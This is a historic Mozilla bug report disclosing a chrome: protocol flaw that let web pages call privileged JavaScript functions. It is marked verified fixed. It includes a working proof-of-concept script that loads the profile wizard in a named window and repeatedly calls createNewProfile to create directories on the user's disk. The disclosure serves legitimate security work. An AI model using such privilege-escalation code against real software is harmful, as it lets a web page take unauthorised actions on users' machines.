Closed Bug 21923 Opened 25 years ago Closed 25 years ago

Executing functions in "chrome:" protocol - #2.

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

There is another chrome vulnerability, which allows executing JavaScript
functions in the "chrome:" protocol.
This is dangerous because such functions have much more priviligies than
JavaScript functions loaded from a web page.
If one opens a "chrome:" url in a window, he have access to all functions in the
window and the functions are executed by "windowname.functionname()" in the
"chrome:" protocol.
Some of the predefined functions in the Mozilla chrome may do dangerous things.

The code is:
----------------------------------------------------------------------
<SCRIPT>
b=window.open("","victim");
function g()
{
b.profile.createNewProfile("georgi","c:\\georgi\\");
alert("Profile created! You'd better close this window because directories are
created");
}
setInterval("g()",4000);
</SCRIPT>

<A HREF="chrome://profile/content/createProfileWizard.xul"
TARGET="victim">Follow this link for demonstration</A>
----------------------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M13
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Added call to CheckLoadURI from TriggerLink.
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.